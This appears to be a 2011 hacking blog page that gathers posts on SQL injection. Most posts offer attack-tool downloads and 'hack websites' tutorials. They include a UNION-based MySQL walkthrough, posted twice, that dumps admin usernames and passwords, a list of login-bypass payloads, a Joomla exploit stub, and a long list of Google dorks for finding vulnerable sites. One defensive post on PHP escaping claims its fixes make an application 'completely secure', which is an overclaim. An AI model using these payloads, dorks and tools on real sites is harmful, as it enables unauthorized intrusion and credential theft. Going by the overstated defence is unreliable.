Showing posts with label sql injection attack. Show all posts
Showing posts with label sql injection attack. Show all posts

Saturday, 28 May 2011

SQL injection Hack tool for hacking websites and database

Safe3SI is one of the most powerful and easy usage penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
how to hack websites using SQL injection, SQL Hack tool


Features

  • Full support for http, https website.
  • Full support for Basic, Digest, NTLM http authentications.
  • Full support for GET, Post, Cookie sql injection.
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  • Full support for four SQL injection techniques: blind, error-based, UNION query and force guess.
  • Powerful AI engine to automatic recognize injection type, database type, sql injection best way.
  • Support to enumerate databases, tables, columns and data.
  • Support to read,list and write any file from the database server underlying file system when the database software is MySQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is Oracle or Microsoft SQL Server.
  • Support to ip domain query,web path guess,md5 crack etc.
  • Support for sql injection scan.

Download
Posted by at No comments:
Labels:

SQL Injection tutorial to Hack websites | Hacking websites

we have already discussed about SQL Injections method of hacking websites . Some of my website users reported that those articles are little bit difficult to understand for new users who wish to learn hacking. For the sake of new users who wish to learn website hacking and SQL injection, i am writing this article  at such a basic level that the user who didn't even have any prior knowledge of SQL can start SQL Injecting websites. This article is also beneficial for hackers too as it will refresh their concepts that what really we have to do and look into website URL if we want to hack website or its database using SQL injection. So Guys read on very basic SQL injection tutorial...
hacking websites, sql injection attack
SQL injection tutorial to hack websites | Hacking website databse


What is SQL Injection?
Basically SQL Injections or simply called Structured Query Language Injection is a technique that exploits the loop hole in the database layer of the application. This happens when user mistakenly or purposely(hackers) enters the special escape characters into the username password authentication form or in URL of the website. Its basically the coding standard loop hole. Most website owners doesn't have proper knowledge of secure coding standards and that results into the vulnerable websites. For better understanding, suppose you opened a website and went to his Sign in or log in page. Now in username field you have entered something say Adnan and in the password box you pass some escape characters like ',",1=1, etc... Now if the website owner hasn't handled null character strings or escape characters then user will surely get something else that owner never want their users to view.. This is basically called Blind SQL.

Requirements for SQL Injection:
1. You need a web browser to open URL and viewing source codes.
2. Need a good editor like Notepad ++ to view the source codes in colored format so that you can easily distinguish between the things.
3. And very basic knowledge of some SQL queries like SELECT, INSERT, UPDATE, DELETE etc..

What you should look into website to detect is it vulnerable to SQL injection attack or not?
First of all you can hack those websites using SQL injection hacks that allows some input fields from which can provide input to website like log in page, search page, feedback page etc. Nowadays, HTML pages use POST command to send parameters to another ASP/ASPX page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
 < F O R M action=login. aspx method=post>
< i n p u t type=hidden name=user v a l u e=xyz>
< / F O R M>
Everything between the < f o r m >  and < / f o r m > parameters (remove spaces in words) contains the crucial information and can help us to determine things in more detailed way.


There is alternate method for finding vulnerable website, the websites which have extension ASP, ASPX, JSP, CGI or PHP try to look for the URL's in which parameters are passed. Example is shown below:
http://example.com/login.asp?id=10

Now how to detect that this URL is vulnerable or not:
Start with single quote trick, take sample parameter as hi'or1=1--. Now in the above URL id is the parameter and 10 is its value. So when we pass hi'or1=1-- as parameter the URL will look like this:
http://example.com/login.asp?id=hi' or 1=1--

 You can also do this with hidden field, for that you need to save the webpage and had to made changes to URL and parameters field and modify it accordingly. For example:
< F O R M action=http://example.com/login. asp method=p o s t >
< i n p u t  type=hidden name=abc value="hi' or 1=1--">
< / F O R M >

 
 If your luck is favoring you, you will get the login into the website without any username or password.


But why ' or 1=1-- ?
Take an asp page that will link you to another page with the following URL:

http://example.com/search.asp?category=sports
In this URL 'category' is the variable name and 'sports' is it's value.

Here this request fires following query on the database in background.
SELECT * FROM TABLE-NAME WHERE category='sports'
Where 'TABLE-NAME' is the name of table which is already present in some database.
So, this query returns all the possible entries from table 'search' which comes under the category 'sports'.

Now, assume that we change the URL into something like this:
http://example.com/search.asp?category=sports' or 1=1--

Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database something like:
SELECT * FROM search WHERE category='sports' or 1=1--'
 
The query should now select everything from the 'search' table regardless if category is equal to 'sports' or not.
A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote (').
Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a
 
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''='

How to protect you own websites from SQL injection?
 
Filter out character like   '    "    -    /    \    ;    NULL, etc. in all strings from:
* Input from users
* Parameters from URL
* Values from cookie
That's all for today, 
I hope it really helped you to clear your basics about website hacking or website database hacking using SQL injection.
If you have any queries ask me in form of comments...
Regards
sarvesh
Posted by at No comments:
Labels:

How To Hack Websites With Hexjector v1.0.7.3 Special Edition

Hexjector is an Opensource,Multi-Platform PHP script to automate site Pentest for SQL Injection Vulnerabilties

Features:
1.Check for SQL Injection Vulnerablities.
2.Pentest SQL Injection Vulnerablities.
3.Detect WAF on the site.
4.Scan For Admin Page
5.Manual Dump Function
6.Browser
7.SQL Injection Type Detection

Download:Sql Injection Tool Hexjector
...............:"{)(*&^%$#@!###.................................................................................................
Posted by at No comments:
Labels:

How Hackers Hack Websites With ExploitMyUnion v2.1


ExploitMyUnion is a tool written in Python with a PyQt user interface made to automate sql injection exploitation. 



Features:
Injection via GET/POST/COOKIE.
Quoted injections support.
HTTP proxy support.
SQL 'load_file()' function support.
SQL 'INTO OUTFILE' statement support.
Ability to save/restore injection parameters.
Can dump a table in sql format.

Download This Sql Injection Tool Here
Posted by at No comments:
Labels:

Learn How Hackers Hack Websites MYSQL Injection Tutorial (Part 2)

Learn How To Hack Websites , Mysql Injection Tutorial
SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website
..............................................................................................................................................................
Posted by at No comments:
Labels:

Hack Websites With Sql Injection Tool By Pr0xy v2.2.0 + Video Demonstration

Injection tool by Pr0xY v2.2.0
Code:
+---------------------------------------+
+ Injection tool by Pr0xY +
+ Version 2.2.0 +
+---------------------------------------+

Examples to use:

*Mode(SQLi helper) : main.pl
*Mode(Blind helper): main.pl blind
*Mode(SQLi scanner): main.pl sis (automatic attack = 0 [0=false/1=true])*
*Mode(AdminFinder) : main.pl adminFinder
*Mode(FTP BF) : main.pl FTPbf
*Mode(MD5 BF) : main.pl MD5bf
*Mode(MD5 encode) : main.pl MD5en
*Mode(Hex) : main.pl hex
*Mode(Update) : main.pl update
*Mode(about) : main.pl about

Fast use:

-t Is the target
-mc Is the maximun columns to find
-p/pr0xy Is the proxy for use
-c Is the comment for the injection
-dt Is the data base type(0=Mysql, 1=MSSQL)
-h For help

Helper options:
Code:
Select an action:

0)Stop the scan
1)Get Databases
2)Get Tables
3)Get Columns
4)Dump data
5)Load file
6)MySQL.user
7)Save structure

In this version I made sure to improve user convenience and efficiency of dump

Download:
http://www.learnhtml.co.il/yoni_project.rar

Video demonstrates using "Quick Launch":
http://www.youtube.com/watch?v=Da57SFQmxUA
............................................................................
Posted by at No comments:
Labels:

How To Hack Websites (SQL Injection Tutorial)

SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1
or
www.site.com/id=5
Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:
www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5-- If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--
This is what we would enter if we have 4 columns. If you have 7 columns you would put, union all select 1,2,3,4,5,6,7-- . If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6

In this Step we want to list all the column names in the database, to do this we use the following command:
union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website.
A very Nice Tutorial Written by sarvesh from buddyhack.blogspot.com
Posted by at No comments:
Labels:

Hack Websites Top 10 Tricks to Exploit SQL Servers

Whether it is through manual poking and prodding or the use of securitytools, malicious attackers employ a variety of tricks to break into SQL server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.testing


1. Direct connections via the Internet
These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield?s Port Report shows just how many systems are sitting out there waiting to be attacked. I don?t understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.


2. Vulnerability scanning
Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or thedatabase system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assesment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.?s NGSSquirrel for SQL Server (for database-specific scanning). They?re easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.

Figure 1: Common SQL injection vulnerabilities found using WebInspect.


3. Enumerating the SQL Server Resolution Service
Running on UDP port 1434, this allows you to find hidden database system. Chip Andrews? SQLPing v 2.5 is a great tool to use to look for SQL server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren?t listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.


4. Cracking SA passwords
Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS software Ltd. also have this capability.


5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access. 

Figure 2: SQL Server vulnerability exploitable using Metasploit?s MSFConsole.

6. SQL injection
SQL injection attacks are executed via front-end Web applications that don?t properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informativeprefer to perform the follow-through using an automated tool, such as SPI Dynamics? SQL Injector, shown in Figure 3.


Figure 3: SPI Dynamics? SQL Injector tool automates the SQL injection process. errors, commands being executed and more. These attacks can be carried out manually ? if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I


7. Blind SQL injection
These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn?t receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that?s where Absinthe, shown in Figure 4, comes in handy.


Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.


8. Reverse engineering the system
The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you?ll find a discussion about reverse engineering ploys.


9. Google hacks
Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors ? such as ?Incorrect syntax near? ? leaking from publicly accessible systems. Several Google queries are available at Johnny Long?s Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web Servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google?s ?site:? operator often turns up juicy info you never imagined you could unearth.

10. Perusing Web site source code
Source Code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.
.................................................................................................................................................
Posted by at No comments:
Labels:

Hack Joomla Component (com_rsform) Vulnerable To SQL Injection

cial Thanks To Team Inj3ct0r

========================================================================
        Joomla Component com_rsform Sql Injection Vulnerability
========================================================================

::[0x00] Informations ::

Author : dragoµn
Email & msn : dragoun[dot]dash[at]gmail.com
Date : 30 July 2010
Critical Lvl : low
Where : From Remote
web : http://h4ck-it.blogspot.com
Category: webapps
Dork : n/a
Vendor: http://www.rsjoomla.com/

------------------------------------------------------------------------

::[0x01] SQL Injections ::

http://example/index.php?option=com_rsform&Itemid=[SQLi]

------------------------------------------------------------------------
::[0x02] Demo Example::

http://www.site.com/index.php?option=com_rsform&Itemid=[SQLi]
.................................................................................................................................................
Posted by at No comments:
Labels:

Hack some facebook apps (apps.facebook.com vulnerable to SQL and html Injection )

This is very strange think facebook have sql vulnerability





 Some info for all of you injector team broke facebook code
Special Thanks To TeAM inj3ct0r 
Part 1 Original: http://inj3ct0r.com/exploits/11638
Part 2 Original: http://inj3ct0r.com/exploits/13403
Posted by at No comments:
Labels:

Hack Websites A Good Collection Of SQL Injection Tools


1.Havij 1.7 -

http://rapidshare.com/files/322555573/Havij_1.07.exe

2.SQLi Helper 2.7 -
http://rapidshare.com/files/322556434/sqliHelper_2.7.rar

3.SQLi Injecter V2.0 -

http://rapidshare.com/files/322559013/SqlInjv2.rar

4.m4x MSSQL Injection

http://rapidshare.com/files/322557397/m4xmssql.rar

5.m4x MySQL Injection
http://rapidshare.com/files/322559902/m4xmysql.rar

6.SQL TooL v2.3

http://rapidshare.com/files/322560724/SQL_TOOL_V2.3.rar

7.Simple SQLi Dumper v0.1

http://rapidshare.com/files/322561134/Simple_SQLi_Dumper.rar
...................................................................................................................................................
Posted by at No comments:
Labels:

Hack Websites A Good Collection Of SQL Injection Tools


1.Havij 1.7 -

http://rapidshare.com/files/322555573/Havij_1.07.exe

2.SQLi Helper 2.7 -
http://rapidshare.com/files/322556434/sqliHelper_2.7.rar

3.SQLi Injecter V2.0 -

http://rapidshare.com/files/322559013/SqlInjv2.rar

4.m4x MSSQL Injection

http://rapidshare.com/files/322557397/m4xmssql.rar

5.m4x MySQL Injection
http://rapidshare.com/files/322559902/m4xmysql.rar

6.SQL TooL v2.3

http://rapidshare.com/files/322560724/SQL_TOOL_V2.3.rar

7.Simple SQLi Dumper v0.1

http://rapidshare.com/files/322561134/Simple_SQLi_Dumper.rar
...................................................................................................................................................
Posted by at No comments:
Labels:

Avoiding SQL Injection 

 
SQL injections are among the flaws the most widespread and dangerous in PHP.
This tutorial will explain clearly the concept of SQL Injection and how to avoid 
them once and for all.

--------------------------------------------------------------------

>>>>>>
Summary of tutorial:
I) Presentation of the problem.
=> The variables containing strings
II)Security .
=> Explanation
=> Numeric variables
.Method 1
.Method 2
>>>>>>

--------------------------------------------------------------------


I) Presentation of the problem.
___________________________

There are two types of SQL injection:

* Injection into the variables that contain strings;
* Injection into numeric variables.

These are two very different types and to avoid them, it will act
differently for each of these types.

######################
The variables containing strings:
######################

Imagine a PHP script that fetches the age of a member according to its
nickname. This nickname has gone from one page to another via the URL
(by $ _GET what: p). This script should look like this:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++...
$pseudo = $_GET['pseudo'];
$requete = mysql_query("SELECT age FROM membres WHERE pseudo='$pseudo'");
...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Well keep you well, this script is a big SQL injection vulnerability.
Suffice it to a bad boy putting in place the username in the URL a query
like this:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
' UNION SELECT password FROM membres WHERE id=1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
It is to arrive to show (just an example), for example the password for
the member with the id 1. I will not explain in detail the operation for
fear that someone is not nice to walk around. Well, so let us go to the
security:).

II) Security .
_______________

To secure this type of injection is simple. You use the function
mysql_real_escape_string ().

######################
Uh ... It does what it?
######################

This feature adds the "\" character to the following characters:

+++++++++++++++++++++++++++++++++++++++++++++++++
NULL, \ x00, \ n, \ r, \, ', "and \ X1A
++++++++++++++++++++++++++++++++++++++++++++++++++++
######################
And what's the point?
######################

As you have noticed in previous injection, the attacker uses the quote
(to close the 'around $ nick): if she is prevented from doing that, the
bad boy will only have to look elsewhere . This means that if one
applies a mysql_real_escape_string () to the variable name like this ...

+++++++++++++++++++++++++++++++++++++++++++++++++++++...
$pseudo = mysql_real_escape_string($_GET['pseudo']);
$requete = mysql_query("SELECT age FROM membres WHERE pseudo='$pseudo'");
...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
The application is completely secure.
Explanation

######################
Injection hacker to recall:
######################

+++++++++++++++++++++++++++++++++++++++++++++++++++
' UNION SELECT password FROM membres WHERE id=1
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
Well if we apply mysql_real_escape_string () to the variable $ name used
in the query is what will the injection:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
\' UNION SELECT password FROM membres WHERE id=1
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
This means that we do not even come out of assessments around $ nick in
the request because the \ has been added. There is another function
somewhat similar to mysql_real_escape_string () is addslashes (), why
not have used? Well recently, a security hole was discovered on this if
it is used on a PHP 4.3.9 installation with magic_quotes_gpc enabled.

######################
Numeric variables:
######################

This type of injection is less known than the previous one, making it
more frequent, and it starts as just now with an example. This time, it
displays the age of a member according to its id, and by passing it by a
form ($ _POST) to change:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++...
$id = $_POST['id'];
$requete = mysql_query("SELECT age FROM membres WHERE id=$id");
...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
mysql_real_escape_string () would be nothing here, since if an attacker
wants to inject SQL code, it will not need to use quotes, because the
variable $ id is not surrounded by quotes. Simple example of
exploitation:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2 UNION SELECT password FROM membres WHERE id=1
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
This injection did exactly the same as the previous one, except that
here, to avoid it, there are two solutions:

* Change the contents of the variable so it contains only numbers;
* Check if the variable actually contains a number before using it in a query.

##########
Method 1:
##########

We'll use a function , intval () This function returns regardless of the
contents of a variable its numerical value. For example:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$variable = '1e10';  // $variable vaut '1e10'
$valeur_numerique = intval($variable); // $valeur_numerique vaut 1
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Now back to our sheep:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$id = intval($_POST['id']);
$requete = mysql_query("SELECT age FROM membres WHERE id=$id");
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
That is: you can stop there and is more than enough, but I recommend you
continue to find another method, or you have air beast if you find this
method on a code that is not yours without understand it.

############
Méthode 2:
###########

Here we use a function that returns TRUE when a variable contains only
numbers and FALSE if it is not the case this function is is_numeric (),
we will use it in a condition that checks whether is_numeric ( ) returns
TRUE well.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$id = $_POST['id'];
if (is_numeric($id))
{
$requete = mysql_query("SELECT age FROM membres WHERE id=$id");
}
else
{
echo "Trying to hack me ? Your ip is recorded Ksecurity-Team";
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
##################################################################
What is the best, depending intval () and is_numeric ()?
##################################################################

Well I will say that they are both equally effective, they are equal.
But I prefer inval () since with is_numeric () write more code, and if
the variable does not contain only numbers, the request is canceled (in
principle, but of course you can run the same query by choosing an
default value for the variable used). Well that's it! You know all about
securing your applications. If you apply these methods, there is
absolutely no risk of having a fault type SQL injection on its website
(or PHP).

Posted by at No comments:
Labels:

Hack Websites With Havij 1.06 - Advanced SQL Injection Tool


Havij-----Version 1.06Copyright © 2009By r3dm0v3 3dm0v3[4t]yahoo[.]comPlease tell me your offers and report bugs.Check for updates!Licence-------This program is free software. I hope it be useful for you.This software is provided "as is" without warranties.Feel free to share and distribute it anywhere but please keep the files original!What's New?------------Oracle database-MsAccess database-Find Admin-Proxy support-Filtering enabled-update/delete/insert-Group_concat for mysql-New look-User agent header-Load cookie from page-Analyze method made better (specially for mysql)-Many bugs fixed.Features--------Data Bases: MsSQL 2000/2005 with error, MsSQL 2000/2005 no error, MySQL, Oracle, MsAccessFind admin pageGetting InformationGetting Tables, Columns, DataCommand Executation (mssql only)Reading Files (mysql only)insert/update/delete dataProxy supportGuessing tables and columns in mysql<5Fast getting tables and columns for mysql.Checking different injection syntaxes.Changing http headersBypass illegal union.Avoid using strings.
DOWNLOAD LINKS:-
....
Posted by at No comments:
Labels:

Injection Helper v2

Injection Helper hacks





................................................................................................................................................
Posted by at No comments:
Labels:

Hack Websites With REAL Sql

REAL SQL was programmed by me in REALBasic.

What is does is search through Google, using Google Dorks and tries each website for an SQL Injection Vulnerability and if it is successful it will return the vulnerable link to you!

This is the main GUI of the application and in later screenshots I will show you it's features.

Here is the search function and you can see it is returning a vulnerable URL

The search is complete and there were 3 vulnerable URLs found!

This is the save button making a .txt file of all the working links

Showing the contextual menu in the results box

Code:
http://www.megaupload.com/?d=Z7CC9C7U
password Logie
--------------------------------------------
Filename: REAL Sql - V0.3.rar
File description: REAL Sql - V0.3 - Logie
File size: 1.01 MB
Posted by at No comments:
Labels:

SQL INJECTION DORKS TO FIND VULNERABLE WEBSITES


inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
